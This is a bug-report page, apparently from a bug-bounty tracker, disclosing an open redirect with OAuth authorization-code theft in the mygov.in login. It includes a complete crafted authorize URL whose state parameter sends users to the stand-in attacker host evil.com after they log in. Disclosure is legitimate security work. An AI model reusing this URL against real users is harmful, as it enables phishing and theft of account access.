Chat with BLT Bot

We reply immediately

Loading...

Open Redirection with oauth code stealing in indian government\u0027s mygov.in webapp. The URL : https://auth.mygov.in/oauth2/authorize?response_type\u003Dcode\u0026client_id\u003DMyGovStartUpIndia\u0026redirect_uri\u003Dhttp://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve\u0026scope\u003Duser_profile\u0026state\u003Dhttps://evil.com/ will redirect the user of mygov.in to evil.com after that user logs in with correct credentials. This makes the attack more effective because hacker can redirect the real users who has account in mygov.in . And the attacker site will also get access to his profile with the OAuth code.

https://auth.mygov.in/


Tweet   GitHub Link  

Screenshots

Comments (0)

To comment, please sign in.

Event ID: 1181

User Profile Logo
Total Points = 320
crypto address qr code
User Profile Logo
Issues Reported: 1
Browser Image
Browser Version: 68.0
Operating System Linux
Added On
Aug. 30, 2020, 6:38 a.m.
Bug Type
Security
Submitted
Independently
OS Version:
Unknown
v1.5